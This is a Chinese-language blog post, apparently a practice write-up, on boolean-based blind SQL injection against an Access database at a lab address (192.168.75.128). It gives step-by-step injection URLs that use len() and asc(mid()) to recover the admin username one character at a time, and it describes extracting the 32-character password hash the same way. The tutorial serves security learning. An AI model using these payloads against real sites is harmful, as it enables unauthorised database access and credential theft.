Access数据库盲注练习

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>5

显示错误

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>4

显示正常

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)=4

显示错误

 

 

 

 

 

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)=5

显示正常

 

所以admin列的第一条记录有5个字符的长度,然后根据ASCII码来从第一个字符开始猜

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)>100

 显示admin表中的第一条记录的第一个字符,asc(表名,位置,1) 中的1代表这一列

显示错误

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)>97  显示错误

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)>96  显示正常

 

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)=96 显示错误

 

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,1,1)) from admin_user)=97 显示正常

说明第一个字符的ASCII码是97,a

 

再猜第二个字符

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,2,1)) from admin_user)=100

 

ASCII码为d

 

第三位

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,3,1)) from admin_user)=109

 

ASCII码为109的是m
第四位

http://192.168.75.128/common.asp?id=7 and(select top 1 asc(mid(admin,4,1)) from admin_user)=105

 

105是i

 

第五位

110是n

 

所以admin字段中的第一个内容是admin,

 

猜解密码

 

再用等号试一下

所以密码加密后是32位的,再利用前面类似的用ASCII码猜每一位。

 

 

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值